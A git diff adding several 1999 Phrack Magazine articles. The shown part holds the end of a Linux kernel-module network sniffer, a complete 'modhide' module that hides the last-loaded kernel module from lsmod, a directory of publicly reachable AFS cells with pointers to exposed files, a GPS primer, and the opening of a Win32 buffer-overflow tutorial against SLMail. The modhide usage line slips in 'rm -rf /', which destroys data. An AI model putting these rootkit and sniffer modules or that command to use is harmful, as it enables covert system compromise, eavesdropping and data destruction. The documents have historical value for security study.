+	victim.daddr 	= 0;
+	victim.sport 	= 0;
+	victim.dport 	= 0;
+	victim.active 	= FALSE;
+	victim.totlen 	= 0;
+	victim.data 	= NULL;
+}
+
+
+/* trivial but useful functions below. Damn, I miss libc :) */
+char *in_ntoa(__u32 in) {
+	static char buff[18];
+	char *p;
+
+	p = (char *) &in;
+	sprintf(buff, "%d.%d.%d.%d",
+		(p[0] & 255), (p[1] & 255), (p[2] & 255), (p[3] & 255));
+	return(buff);
+}
+
+void m_strncpy(char *dest, char *src, int size) {
+	char *i, *p;
+	p = dest;
+	for(i = src; *i != 0; i++) {
+		if (!size) break;
+		size--;
+
+		*p = *i;
+		p++;
+	}
+	*p = '\0';
+}
+
+int m_strlen(char *ptr) {
+	int i = 0;
+	while (*ptr) {
+		ptr++;
+		i++;
+	}
+	return i;
+}
+
+
+/* init_module */
+int init_module(void) {
+
+#ifdef DEBUG
+	debug = TRUE;
+#else
+	debug = FALSE;
+#endif
+
+	in_c = out_c = thru_c = 0;
+
+	victim.saddr	= 0;
+	victim.daddr	= 0;
+	victim.sport	= 0;
+	victim.dport	= 0;
+	victim.active	= FALSE;
+	victim.data	= NULL;
+
+	if (dev) {
+		d = dev_get(dev);
+		if (!d) {
+			DBGPRN2("Did not find device %s!\n", dev);
+			DBGPRN1("Sniffing all known devices...");
+		}
+		else {
+			DBGPRN3("Sniffing device %s, ifindex: %i\n", 
+				dev, d->ifindex);
+			sniff_proto.dev = d;
+		}
+	}
+	else
+		DBGPRN1("Sniffing all known devices...\n");
+
+	sniff_proto.type = htons(ETH_P_ALL);
+
+	/* this one just gets us incoming packets */
+/*	sniff_proto.type = htons(ETH_P_IP); */
+
+	sniff_proto.func = pkt_func;
+	dev_add_pack(&sniff_proto);
+
+	return(0);
+}
+
+void cleanup_module(void) {
+	dev_remove_pack(&sniff_proto);
+	end_victim();
+
+	DBGPRN4("Statistics: [In: %i] [Out: %i] [Thru: %i]\n",
+		in_c, out_c, thru_c); 	
+	DBGPRN1("Sniffer Unloaded\n");
+}
+
+/* EOF */
+<-->
+<++> P55/Linux-lkm/modhide/modhide.c !c9a65c89
+/*
+ * generic module hidder, for 2.2.x kernels.
+ *
+ * by kossak (kossak@hackers-pt.org || http://www.hackers-pt.org/kossak)
+ *
+ * This module hides the last module installed. With little mind work you can
+ * put it to selectivly hide any module from the list.
+ *
+ * insmod'ing this module will allways return an error, something like device
+ * or resource busy, or whatever, meaning the module will not stay installed.
+ * Run lsmod and see if it done any good. If not, see below, and try until you 
+ * suceed. If you dont, then the machine has a weird compiler that I never seen.
+ * It will suceed on 99% of all intel boxes running 2.2.x kernels.
+ * 
+ * The module is expected not to crash when it gets the wrong register, but
+ * then again, it could set fire to your machine, who knows...
+ *
+ * Idea shamelessly stolen from plaguez's itf, as seen on Phrack 52. 
+ * The thing about this on 2.2.x is that kernel module symbol information is 
+ * also referenced by this pointer, so this hides all of the stuff :)
+ *
+ * DISCLAIMER: If you use this for the wrong purposes, your skin will fall off,
+ *             you'll only have sex with ugly women, and you'll be raped in
+ *             jail by homicidal maniacs.
+ *
+ * Anyway, enjoy :)
+ *
+ * USAGE: gcc -c modhide.c ; insmod modhide.o ; lsmod ; rm -rf /
+ */
+
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#include <linux/module.h>
+#include <linux/version.h>
+
+int init_module(void) {
+
+/*
+ *  if at first you dont suceed, try:
+ *  %eax, %ebx, %ecx, %edx, %edi, %esi, %ebp, %esp 
+ *  I cant make this automaticly, because I'll fuck up the registers If I do 
+ *  any calculus here.
+ */
+	register struct module *mp asm("%ebx");
+	
+	if (mp->init == &init_module) /* is it the right register? */
+		if (mp->next) /* and is there any module besides this one? */
+			mp->next = mp->next->next; /* cool, lets hide it :) */
+	return -1; /* the end. simple heh? */
+}
+/* EOF */
+<-->
+----[  EOF
diff --git a/phrack55/13.txt b/phrack55/13.txt
new file mode 100644
index 0000000..7c9a95b
--- /dev/null
+++ b/phrack55/13.txt
@@ -0,0 +1,345 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 13 of 19  ]
+
+
+-------------------------[  Black Book of AFS  ]
+
+
+--------[  nicnoc  ]
+
+
+----[  Introduction
+
+AFS is commonly deployed as a distributed filesystem solution in academic and
+research environments.  This short article serves as an introductory guide to
+publicly-accessible resources on AFS.  As always, misuse of this information
+by the reader is taken at his or her own peril.
+
+The current incarnation of AFS grew out of research conducted with the Andrew
+FileSystem at Carnegie-Mellon University, also home of the CODA distributed fs
+research (http://www.coda.cs.cmu.edu/).  AFS is now a commercial product,
+supported and sold by the Transarc Corporation (www.transarc.com).
+
+
+----[  Conventions
+
+Resources on AFS listed in this document will take the form of '/afs/cell
+name'.  As you will discover, certain hosts are only accessible from a gateway
+immediately associated with the cell.  For example, the node net.mit.edu
+can only be reached from the outside (ie. using methods other than a local
+fs mount) through the web.mit.edu AFS gateway.  Where appropriate, these
+access restrictions are noted. 
+
+
+----[  Basics
+
+Terminology
+-----------
+cell : Multiple hosts within the same domain sharing a single fs image.
+ - local cell   : Describes a cell within the local domain.
+ - foreign cell : All cells not within the local domain.
+ - cell name    : Usually a derivation of the FQDN.
+node : Generic term for any host on the network.
+ACL  : Access Control List - who gets what, and how.
+
+Technical 
+---------
+Access permissions of files and directories on an AFS cell are handled
+independently of the underlying operating system permissions.  Traditional
+Unix fs permission bits are divided into read, write, and execute.  The AFS
+ACL groupings build on this concept and add extensions suitable for
+distributed file-sharing.  
+
+Below is a basic introduction to concepts and commands used to manage AFS; by
+no means a complete treatment of the subject.  See tutorials at
+http://www.alw.nih.gov/Docs/AFS/AFS_toc.html and
+http://www.slac.stanford.edu/comp/unix/afs/users-guide/afs-frames.htm for
+more information. 
+
+ACL bits
+--------
+r : read        : view directory and file contents
+l : lookup      : searching of a directory for filenames (recursive find)
+i : insert      : create a new directory or file
+d : delete      : remove a file or subdirectory
+w : write       : modification of file contents
+k : lock        : owner's processes allowed to flock() in this dir
+a : administer  : user permitted to modify ACL for this resource
+
+Commands for ACL listing and modification 
+-----------------------------------------
+fs: listacl <filename> (alias: la) : list access control list
+setacl <directory> <username> <permissions> (alias: sa)
+.... set access control list
+
+ex. setacl secret.doc jsbach lidrw
+
+pts:
+Invoked as 'pts option' on the command-line.  Manages protection
+groups, which permit a smaller group of users to access resources
+owned by another user.
+ options:
+  adduser -user user1 user2... -group <owner>:<group name>
+  	.... adds user(s) to an existing protection group
+  removeuser -user user1 user2... -group <owner>:<group name>
+  	.... removes user(s) from a protection group 
+  creategroup <owner>:<group name>
+  	.... create a protection group
+  examine <path>
+  	....  volume name of specified resource at <path>
+  membership -name <user>  (alternatively <group name>:<owner>)
+  	.... list protection group membership for user
+		
+Protocol information
+--------------------
+	AFS is implemented over wide-area TCP/IP networks, optionally 
+authenticating users with a modified Kerberos implementation.  Client nodes 
+utilize a cache manager, which stores frequently-accessed data on a local 
+disk for faster retrieval.  
+
+	Taken from an unknown cell's /etc/service, the ports and 
+protocols that make AFS work its magic: 
+
+afs3-fileserver 7000/udp       # file server itself
+afs3-callback   7001/udp       # callbacks to cache managers
+afs3-prserver   7002/udp       # users & groups database
+afs3-vlserver   7003/udp       # volume location database
+afs3-kaserver   7004/udp       # AFS/Kerberos authentication service
+afs3-volser     7005/udp       # volume management server
+afs3-errors     7006/udp       # error interpretation service
+afs3-bos        7007/udp       # basic overseer process
+afs3-update     7008/udp       # server-to-server updater
+afs3-rmtsys     7009/udp       # remote cache manager service
+
+Gateways
+========
+	Legitimate access to AFS is quite easy to obtain.  Any alumnus of 
+an institution where AFS is widely deployed (MIT, CMU, Stanford, etc.) 
+usually has an account on a connected node.  Additionally, it is not 
+uncommon for admins to grant research accounts on university systems 
+to friends outside.  
+	For those without friends and we, the unwashed masses, there are 
+gateways which allow access to AFS through other services.  In the early 
+1990's, these were commonly found on institution FTP and Gopher sites.  
+Today, most gateways provide proxied access to AFS through the web.  
+Transarc provides the WebSecure product which is the most commonly used
+gateway software.
+	AFS->web gateway discovery is a matter of blind luck, although
+with the assistance of a search engine, it is possible to select possible
+candidates. 
+
+Two commonly-used gateways are: 
+	web.mit.edu 
+	www.transarc.com
+
+The MIT gateway is more controlled than the Transarc's.  
+Of the 74 active cells discovered, MIT permits only 12:
+	andrew.cmu.edu 			athena.mit.edu
+	cmu.edu 			cs.cmu.edu
+	ece.cmu.edu 			iastate.edu
+	ir.stanford.edu 		net.mit.edu
+	northstar.dartmouth.edu 	sipb.mit.edu
+	transarc.com 			umich.edu
+
+Some cells local to mit.edu are accessible through the gateway with aliases, 
+namely: athena, dev, net, and sipb.  These aliases and restricted-access
+nodes are not enumerated. 
+
+Directory
+=========
+	This listing comes from an audit of active nodes accessible 
+through the transarc.com AFS->web gateway.  From a dataset of 511 entries, 
+74 were found to be active.  The unofficial AFS FAQ (section 1.07)
+(/afs/transarc.com/public/afs-contrib/doc/faq/afs-faq.html)
+assisted with identification of certain cells. 
+	Data were collected from a recent CellservDB 
+(/afs/transarc.com/service/etc/CellServDB.export) and the output of 
+'ls /afs' on an AFS node.  A simple script linking lynx, grep, 
+sort and awk produced the below listing.  All listed nodes were verified 
+to be accessible from an external network on 07.22.1999.  
+
+## Corporate (COM)
+|
+# Transarc Corporation
+	transarc.com	
+
+## Education (EDU)
+|
+# Arizona State University
+	asu.edu		
+# Boston University
+	bu.edu			
+# Carnegie-Mellon University
+	cmu.edu			
+	andrew.cmu.edu
+	ce.cmu.edu		
+	! cs.cmu.edu		# Top-level directory not browsable	
+	ece.cmu.edu	
+	me.cmu.edu
+# Cornell University 
+	graphics.cornell.edu	
+	msc.cornell.edu
+	theory.cornell.edu
+# Dartmouth College
+	northstar.dartmouth.edu
+# Indiana State University
+	iastate.edu
+# Indiana University
+	ovpit.indiana.edu
+# Massachusetts Institute of Technology
+	athena.mit.edu
+	sipb.mit.edu
+# North Carolina Agricultural and Technical State University
+	ncat.edu
+# North Carolina State University
+	eos.ncsu.edu
+	unity.ncsu.edu
+# Notre Dame
+	nd.edu
+# Pennsylvania State University
+	psu.edu
+# Pittsburgh Supercomputing Center
+	psc.edu
+# Rose-Hulman Institute of Technology
+	rose-hulman.edu
+# Stanford University
+	ir.stanford.edu
+	slac.stanford.edu
+# University of California at Davis
+	ece.ucdavis.edu
+# University of Chicago
+	spc.uchicago.edu
+# University of Illinois at Chicago (NCSA)
+	ncsa.uiuc.edu
+# University of Maryland at Baltimore
+	umbc.edu
+# University of Maryland
+	wam.umd.edu
+# University of Michigan
+	umich.edu
+	citi.umich.edu
+	engin.umich.edu
+	lsa.umich.edu
+	math.lsa.umich.edu
+	dmsv.med.umich.edu
+	sph.umich.edu
+# University of Pittsburgh
+	pitt.edu
+# University of Utah
+	utah.edu
+	cs.utah.edu
+# University of Washington
+	cs.washington.edu
+# University of Wisconsin
+	cs.wisc.edu
+
+## Government (GOV)
+|
+# Argonne National Labs
+	anl.gov
+# Fermi National Accelerator Lab
+	fnal.gov
+# National Energy Research Supercomputer Center
+	nersc.gov
+# National Institutes of Health
+	alw.nih.gov
+# Princeton Plasma Physics Laboratory
+	pppl.gov
+
+## Military  (MIL)
+|
+# Naval Research Laboratory
+	cmf.nrl.navy.mil
+
+## Network
+|
+# Energy Sciences Network
+	es.net
+
+## Organization (ORG)
+|
+# Esprit Research Network of Excellence (European Communities)
+	research.ec.org
+# Open Software Foundation
+	ri.osf.org
+
+## Europe and Asia
+|
+# European Laboratory for Particle Physics, Geneva
+cern.ch
+#Deutsches Elektronen-Synchrotron
+	desy.de
+#Univ. of Cologne Inst. for Geophysics & Meteorology
+	geo.uni-koeln.de
+# DESY-IfH Zeuthen
+	ifh.de
+# Leibniz-Rechenzentrum Muenchen
+	lrz-muenchen.de
+# Max-Planck-Institut fuer Astrophysik
+	mpa-garching.mpg.de
+# TH-Darmstadt
+	hrzone.th-darmstadt.de
+# Technische Universitaet Chemnitz-Zwickau
+	tu-chemnitz.de
+# Albert-Ludwigs-Universitat Freiburg
+	uni-freiburg.de
+# University of Hohenheim
+	uni-hohenheim.de
+# Rechenzentrum University of Kaiserslautern
+	rhrk.uni-kl.de
+# University of Cologne
+	rrz.uni-koeln.de
+# University of Stuttgart
+	ihf.uni-stuttgart.de
+	mathematik-cip.uni-stuttgart.de
+	mathematik.uni-stuttgart.de
+	rus.uni-stuttgart.de
+# IN2P3 production cell
+	in2p3.fr
+# CASPUR Inter-University Computing Consortium
+	caspur.it
+# INFN Sezione di Pisa 
+	pi.infn.it
+# Real World Computer Partnership
+	rwcp.or.jp
+# Chalmers University of Technology - General users
+        others.chalmers.se
+# Royal Institute of Technology, NADA
+	nada.kth.se
+
+Interesting areas
+=================
+	Half of the challenge in network exploration is the act of 
+finding fun items to look at.  The list below is by no means complete, 
+and barely touches the surface of what the author and others have 
+collected over the years.  Enjoy, and good luck hunting. 
+
+/afs/andrew.cmu.edu/local/src/os/ 
+	.... Left over from a time when Irix source resided there.
+/afs/ncat.edu/common/
+	.... Root directory of an Ultrix installation
+/afs/ir.stanford.edu/users/c/l/clinton 
+	.... Not the daughter of the U.S. President, but a reasonable 
+ 	     facsimile thereof which causes much excitement among readers. 
+/afs/rose-hulman.edu/users/manager/agnello/compromised/
+	.... AFS follows the 'user-managed' philosophy of resource
+             management, leaving it up to individual users to secure the
+	     permissions on their own files.  This unfortunate admin 
+	     forgot to set the permissions on data collected during a 
+	     recent (08.08.1999) security compromise.  The world, 
+	     including the intruder, can now browse his work and see
+	     what they have found.
+/afs/umbc.edu/public/cores/
+	.... Corefiles from fileserver crashes at the University of 
+	     Maryland.  No further comment.
+/afs/net.mit.edu/reference/multics/
+	.... Once in a blue moon, you come along a gem like this one. 
+	     Source code, project notes, and electronic messages from
+	     the Multics project.  ./udd/multics/Rochlis contains the
+	     mail, messages, and notes in case you can't find it. 
+
+Greetings
+=========
+	Shouts and thanks go out to route and the r00t crew, ParMaster, 
+cstone, aleph1, and the Slackworks crew.
+
+-- nicnoc
diff --git a/phrack55/14.txt b/phrack55/14.txt
new file mode 100644
index 0000000..6d37a03
--- /dev/null
+++ b/phrack55/14.txt
@@ -0,0 +1,272 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 14 of 19  ]
+
+
+-------------------------[  A Global Positioning System Primer  ]
+
+
+--------[  e5 <e.five@usa.net>  ]
+
+
+----[  1]  Abstract
+
+
+Satellite navigation systems are now one of the most important communication
+tools around today.  Everything from Intercontinental Ballistic Missiles
+to fishing ships benefit from highly accurate position, velocity, and time
+determination 24 hours a day from anywhere in the world.  The most popular
+satellite navigation system, GPS, is now so highly used that one can purchase
+a user-friendly GPS receiver for under $200 at Radio Shack.  This article will
+provide an overview of satellite communications in general, and a more in-depth
+look at GPS.  I hope that this article will help readers understand this highly
+interesting system which is growing more prevalent every day.
+
+
+----[  2]  An Overview of Satellite Communications
+
+Satellites have changed the telecommunications world as much, if not more,
+than fiber optics.  There are over 1,000 satellites in orbit today, and all
+international telephone traffic which is not transmitted over fiber optic
+trunks or buried cable is handled by satellites.  Nearly all international
+television transmissions are sent through satellites.
+
+The first satellite which ever reached orbit was Sputnik 1, launched by the
+Soviet Union on October 4, 1957.  The first attempt at satellite communication
+was the United State government's project Score, which launched a satellite
+on December 18, 1958.
+
+The first international satellite communication system originated when 11
+countries agreed to form Intelsat in August 1964.  Intelsat is responsible
+for the maintenance, design, and development of this international system.
+By the late 1980s the Intelsat system included over 400 Earth stations,
+and provided well over 25,000 two-way telephone circuits between some 150
+countries.
+
+In all satellite communication, signals are transmitted from an Earth station
+to the satellite, where they are amplified and rebroadcasted to another
+station, or forwarded to another satellite which broadcasts the signal to a
+station further away.  Every satellite contains one or more transponders.
+Each transponder includes a receiver, tuned to a frequency, or range of
+frequencies, lying in the uplink (receive) region, and a transmitter tuned
+to a downlink (transmit) frequency or range of frequencies.  The number of
+transponders, or channels, on a satellite determine its communication capacity.
+
+When a satellite is launched, it may go into orbit at any height above the
+earth.  There are generally 3 different classifications for satellite orbit
+heights, described below.
+
+GEOS (Geosynchronous Earth Orbiting Satellite) - This type of orbit, also
+referred to as geostationary orbit, is when a satellite is launched to an
+altitude of precisely 22,300 miles above the Earth.  At this altitude, the
+satellite orbits the Earth every 24 hours.  Thus, to an observer stationed on
+the Earth, the satellite appears to be stationary.  This is a tremendous
+advantage, as it allows complete 24 hour communication within its huge
+footprint (covering approximately 1/4 of the Earth).  However, geosyncronous
+satellites are not ideal for voice circuit transmission.  Due to their
+height above the it takes radio signals approximately .25 seconds to be
+transmitted to the satellite and reflected back down to Earth, depending
+on whether the signal is passed among satellites before it is transmitted
+back down to Earth.  This delay is quite noticeable, and you may notice
+it when talking on international calls.
+
+MEOS (Medium Earth Orbiting Satellite) - This type of orbit is within 6,000 -
+12,000 miles above Earth.  Approximately a dozen medium Earth orbiting
+satellites are necessary to provide continuous global coverage 24 hours a
+day.  Several MEOS systems are now in development, most notably Bill Gates
+and Craig McCaw's Teledesic project, which will ultimately attempt to provide
+Internet access to all corners of the globe (all under Microsoft software, of
+course :) ).
+
+LEOS (Low Earth Orbiting Satellite) - This type of orbit is generally within
+the 500 - 5,000 mile altitude range.  Although the satellite footprint is
+greatly reduced, global coverage can be accomplished through a network of
+satellites, in which if an uplink is required to be transmitted to a location
+outside of the footprint, the transmission is passed from satellite to
+satellite until it reaches the satellite which has the location within its
+footprint.  As there is no noticeable delay for signal transmission, low Earth
+orbiting satellites are becoming the preferable method of voice transmission,
+with numerous companies currently attempting to establish LEO satellite
+networks, most notably Motorola's Iridium project (see www.iridium.com)
+
+
+----[  3]  The Global Positioning System
+
+
+--[  3.0]  Overview
+
+The Global Positioning System was originally designed for, and is still used
+by the U.S. military.  GPS is funded, controlled, and maintained by the
+United States Department of Defense (DOD), although there are thousands of
+civilian users of GPS worldwide.  The GPS project was first initiated by the
+DOD in 1973, and the first experimental GPS satellite was launched in February
+1978.  The GPS system achieved full operational capability (FOC) on July
+17, 1995.  The original scope of the GPS for military operation has been far
+outgrown by civilian operations, and is provided free of charge or
+restrictions (actually, it's paid for by our tax dollars).  The system
+provides continuous, highly accurate positioning anywhere on the planet (where
+the radio signals are not impeded), 24 hours a day.  The system is composed of
+3 segments, described in the following sections: space, control, and user.
+
+
+--[  3.1]  Accuracy
+
+GPS currently provides two levels of point positioning accuracy, the Precise
+Positioning Service (PPS) and the Standard Positioning Service (SPS).  Civilian
+users worldwide use the SPS without charge or restrictions, and most commercial
+receivers are capable of receiving and using the SPS signal.  Authorized
+military users, however, in possession of cryptographic equipment and specially
+equipped PPS receivers (military GPS receivers) may make use of the PPS.  SPS
+use is intentionally degraded by the DOD, by the use of Selective Availability.
+The following table lists PPS and SPS approximate accuracy levels.   However,
+highly accurate commercial service is possible by using a number of corrective
+methods.
+
+                              PPS               SPS
++---------------------+-----------------+-----------------+
+| Horizontal Accuracy |   17.8 meters   |   100 meters    |
++---------------------+-----------------+-----------------+
+|  Vertical Accuracy  |   27.7 meters   |   156 meters    |
++---------------------+-----------------+-----------------+
+|    Time Accuracy    | 100 nanoseconds | 167 nanoseconds |
++---------------------+-----------------+-----------------+
+
+
+--[  3.2]  The Space Segment
+
+The Space Segment consists of the actual constellation of GPS satellites.  The
+GPS Operational Constellation is 24 satellites, orbiting at roughly 12,000
+miles above the Earth, and circling the Earth once every 12 hours.  The GPS
+constellation is placed so that from 5 to 8 satellites are always visible from
+everywhere on Earth.  The 24 satellites are placed in 6 orbital planes, and
+inclined at approximately 55 degrees to the equatorial plane.  GPS operation
+requires a clear line of sight, and the signals cannot penetrate soil, water,
+or walls very well, so satellite visibility can be affected by those factors.
+
+
+--[  3.3]  The Control Segment
+
+The Control Segment of the GPS system is essentially the tracking and
+maintenance section.  The Control Segment consists of a large system of
+tracking stations located around the world, of which 3 have uplink capability
+with GPS satellites.  All GPS data collected from these stations is sent to
+the Master Control Center (MCS), located at Schriever Air Force Base in
+Colorado, for analysis.  The MCS then calculates the satellite's exact orbital
+parameters (ephemeris), as well as clock corrections, and uploads them to GPS
+satellites over an unknown frequency, at least once a day.  Each satellite is
+equipped with precise atomic clocks, allowing them all to maintain synchronous
+GPS time until the next update.
+
+
+--[  3.4]  The User Segment
+
+The GPS User Segment is the wide collection of GPS receivers, and the entire
+GPS user community (both civilian and military).  A GPS receiver converts
+input signals from the satellites into position, velocity, and time estimates.
+The primary function of GPS, however, is navigation in three dimensions.  In
+effect, a GPS position calculation can be reduced to a simple trigonometry
+problem, that of distance intersection.  If one knows the distance from an
+unknown point to three known points, it is possible to calculate the x, y,
+and z coordinates of the unknown point.  The GPS problem is complicated
+slightly more by the fact that the radio signal travel time is unknown.
+However, this simply means taking measurements from at least four satellites.
+Usually multiple satellite signals are used, if possible, as redundant
+measurements will add considerable strength to the solution.
+
+
+--[  3.5]  Satellite Transmissions
+
+GPS satellites transmit two microwave carrier signals, the L1 frequency at
+1575.42 MHz, and the L2 frequency at 1227.60 MHz, although for SPS uses only
+the L1 frequency is used.  The L1 frequency carries the navigation message and
+SPS code signals, and the L2 frequency is used to measure ionospheric delay
+by PPS equipped receivers.  Also UHF signals are used for intra-satellite
+links.
+
+
+--[  3.6]  GPS Packet Format
+
+The navigation message is a continuous 50 BPS date stream modulated onto the
+carrier signal of every satellite.  The data is transmitted in frames of 1500
+bits each, and thus each frame takes 30 seconds to transmit.  Each frame is
+divided into subframes of 300 bits each.  Each subframe is divided into 10
+words of 30 bits each, of which 6 bits in each is for parity, and the rest
+is for data content.  Words one and two of every subframe have the same
+format, as shown in the picture.  The first word, called the telemetry word,
+is composed of an 8-bit preamble used by the GPS receiver to correctly decode
+the data, 16 bits of data, and a final 6 bits for parity.  Word two, known as
+the handover word, contains 17 bits indicating the time of week according to
+the satellite's clock when the end of the subframe will be transmitted, known
+as the Z-count.
+
+
+ 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
++---------------+-------------------------------+-----------+
+| 8-bit preamble|        Data Content           |   Parity  |
++---------------+-------------------------------+-----------+
+                       Telemetry Word
+
+
+ 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
++---------------------------------+-------------+-----------+
+|   17-bit Time of Week Message   |     Data    |   Parity  |
++---------------------------------+-------------+-----------+
+                       Handover Word
+
+
+Subframes 1, 2, and 3 contain the high accuracy ephemeris and clock offset
+data, and the data in these frames can remain constant for hours at times.
+Subframes 4 and 5 contain the almanac data and some related configuration data.
+An entire set of twenty five frames (125 subframes) makes up the complete
+Navigation Message which is sent over a 12.5 minute period.
+
+            .____.____.________________________________________.
+Subframe 1  | TW | HOW|          Clock  Offset  Data           |
+            `----'----'----------------------------------------'
+            .____.____.________________________________________.
+Subframe 2  | TW | HOW|          Orbital Data Set I            |
+            `----'----'----------------------------------------'
+            .____.____.________________________________________.
+Subframe 3  | TW | HOW|          Orbital Data Set II           |
+            `----'----'----------------------------------------'           
+            .____.____.________________________________________.
+Subframe 4  | TW | HOW|  Other Data (configuration data, etc.) |
+            `----'----'----------------------------------------'
+            .____.____.________________________________________.
+Subframe 5  | TW | HOW|            Almanac Data                |
+            `----'----'----------------------------------------'
+
+4 Glossary
+----------
+
+Note that many of these acronyms are not used in this article, but are included
+to allow the reader to understand other technical GPS documents.
+
+DPGS        - Differential GPS
+Ephemeris   - Precise orbital parameters 
+GDOP        - Geometric Dilution of Precision
+GLONASS     - The Russian Equivalent of GPS
+GPS         - Global Navigation System
+MCS         - Master Control Station
+PPS         - Precise Positioning Service
+PRN         - Pseudo Random Noise
+RMS         - Root Mean Square
+SEP         - Spherical Error Probable
+SPS         - Standard Positioning Service
+SV          - Space Vehicle
+UTC         - Universal Coordinated Time
+
+
+----[  5]  Conclusion
+
+I apologize for the extreme brevity of this article, but there is somewhat of
+a lack of information regarding technical aspects of the GPS system.  Don't
+worry, though, I will be submitting some cool telco stuff to phrack later :).
+Until, next time, visit the following websites for more information on
+telecommunications in general:
+
+http://www.internettrash.com/users/e5/         [My page]
+                                               [No Satellite Info yet]
+
+http://www.internettrash.com/users/bft/        [BFT]
+
+
+----[  EOF
diff --git a/phrack55/15.txt b/phrack55/15.txt
new file mode 100644
index 0000000..55adda9
--- /dev/null
+++ b/phrack55/15.txt
@@ -0,0 +1,2193 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 15 of 19  ]
+
+   
+-------------------------[  Win32 Buffer Overflows
+                            (Location, Exploitation and Prevention)
+
+
+--------[ dark spyrit AKA Barnaby Jack <dspyrit@beavuh.org>  ]
+
+
+----[  Abstract
+
+"If you assume that there's no hope, you guarantee there will be no hope.
+If you assume that there is an instinct for freedom, there are
+opportunities to change things."
+
+-Noam Chomsky
+
+
+The Internet - the last great stronghold of freedom of thought, ideas and
+expression - and with each passing moment the bleak outcome of a corporate
+and government controlled entity increases in probability.
+
+The battle lines have been drawn, and for the moment, we have the upper
+hand, but only by a margin.
+
+Software companies with no alternative but to resort to the censorship of
+knowledge have made their presence felt, sites relating to the 'black art'
+of software reversing and the like are being removed on a continual basis.
+
+Hopefully, the few unrestrained who walk the back alleys will continue to
+publish information - and create avenues for others to expand, spread and
+develop - this is where the battle will be won.
+
+Assembly language is a weapon chosen only by few, but those who possess
+the skill to harness its power can and will defeat any of the newer tools
+of modern combat.
+
+I wish you the best of luck finding information, though.  With power, comes a
+price - Assembler isn't the easiest language to learn, and as such you may
+have trouble finding documentation among the hordes of Visual this, Visual
+that, Visual Bloat for Dummies.. but continue your search, you'll be glad
+you did.
+
+When profit gain is the primary momentum, speed, control, size and performance
+of your software is sacrificed for ease of use and 'prompt development'.
+The need to know what goes on internally is a rare necessity and optimization
+is of little importance.  Those that remain untainted by the prospect of
+monetary rewards, and first and foremost are driven by the sheer desire to
+better educate ones self, are those that will always be on the pinnacle -
+and are those that are feared most of all.
+
+With Windows NT now a major player, and the open source movement not looking
+to have any impact in the near future, the ability to 'look under the hood' is
+an incredibly valuable asset and will be the focus of the first section in
+this paper.
+
+It is of no great surprise that attempts to outlaw reverse engineering are
+currently in the works, but the effects of such a proposal would be disastrous. 
+
+Despite the fact that it is an open invitation for vendors to use sub-standard
+coding practice, there are those in the security industry who rely on these
+techniques to find and document vulnerabilities.  The online world would
+suffer as a result.
+
+Do not concede.
+
+
+Introduction.
+~~~~~~~~~~~~~
+
+This paper will be separated into 3 sections.
+
+The first will cover a standard reversing session, and we'll point out a
+common vulnerability.
+
+The second will demonstrate the process of exploiting the weakness - the
+problem with most win32 remote overflow exploits stems from the payload,
+the current trend is to have the shellcode download an external file and
+execute.
+
+Far too many problems result from this technique, depending on
+router/firewall configurations etc.
+
+The payload I present to you will directly spawn a full-blown shell on any
+port you specify, eliminating 90% of most reported problems.  This is the
+first of its kind as far as I am aware.
+
+The last section will show how to add your own code to the executables
+of your target to prevent exploitation.
+
+
+The example I will be using for this document is the latest version of
+Seattle Labs mail server (3.2.3113).  There are numerous buffer overflows
+riddled throughout this software, we'll be concentrating on a port opened by
+the POP service, which provides the Extended Turn functions.
+
+Seattle Labs were contacted about this in a previous version but did not
+bother to remedy the situation, instead they just changed the default port
+from 27 to 8376.
+
+Bad move.
+
+The vulnerabilities were made public by the way, so please, Russ, don't send
+me nasty emails.
+
+Before we begin I will assume you have a general knowledge of Assembler,
+Windows programming, a basic understanding of the Portable Executable
+structure and you know the fundamentals of buffer overflows - I won't be
+re-hashing the basics in this paper.
+
+
+Tools Required:
+
+Interactive Disassembler from http://www.datarescue.com - hands down the BEST 
+disassembler for the PC.
+
+A decent debugger, e.g.: SoftIce.
+
+PE Dump from Matt Peitrek, or dumpbin will suffice.
+
+A hex editor, any will do.. PS Edit does nicely.
+
+A Win32 API reference.
+
+If you want to assemble the tools/exploits that accompany this paper then
+you'll also need TASM 5.0.
+
+The binaries will be available at http://www.beavuh.org as well as the 
+latest goodies that we feel the need to release.
+
+
+Section 1: Under the Hood.  
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Interactive Disassembler Pro is without a doubt, THE tool for reversing code.
+Disassembly begins from the entry point of the program, and follows all routes
+of execution, then continues to locate functions outside of the main flow of
+the program.  You have full control over what is marked as data or code.  IDA
+recognizes a huge amount of library functions, which provides a much better
+understanding of the target.  It will disassemble an unbelievable amount of
+file formats, from a wide range of processors.  You're given the ability to
+have repeatable comments, labels, modify any piece of code, function,
+"interactively".  IDA also includes it's own macro language, to automate
+your chores.
+
+If I were to cover everything this tool can do I would be here all day, and
+I'd still be missing something.
+
+With the combined effort of IDA and Soft Ice, there are no barriers.
+
+This section will be rather short, the only reason being that IDA cuts through
+SLMail's code like a machete.
+
+Load up slmail.exe into IDA and we'll get underway...
+
+
+First we need to think about our target for a minute, we're going to try and
+exploit one of the SMTP commands so it is almost certain they will be accessed
+and compared from a table.. Let's do a search:
+
+Hit <alt+b> "search for text in core" and enter "EXPN", we'll land smack in
+the middle of these ASCII strings.
+
+
+004439C0 aSize           db 'SIZE',0
+004439C5                 align 4
+004439C8 aXtrn           db 'XTRN',0
+004439CD                 align 4
+004439D0 aEtrn           db 'ETRN',0
+004439D5                 align 4
+004439D8 aQuit           db 'QUIT',0             ; DATA XREF: sub_403970+280o
+004439D8                                         ; .data:00448A60o
+004439DD                 align 4
+004439E0 aHelp_0         db 'HELP',0
+004439E5                 align 4
+004439E8 aTurn           db 'TURN',0             ; DATA XREF: sub_403970+F0o
+004439ED                 align 4
+004439F0 aExpn           db 'EXPN',0    
+
+...<snip>
+
+
+Now we need to find the table that references the commands, so we'll do
+another search.. this time entering the dword offset to the left of EXPN
+(004439f0).
+
+And we land in the middle of this mess:
+
+
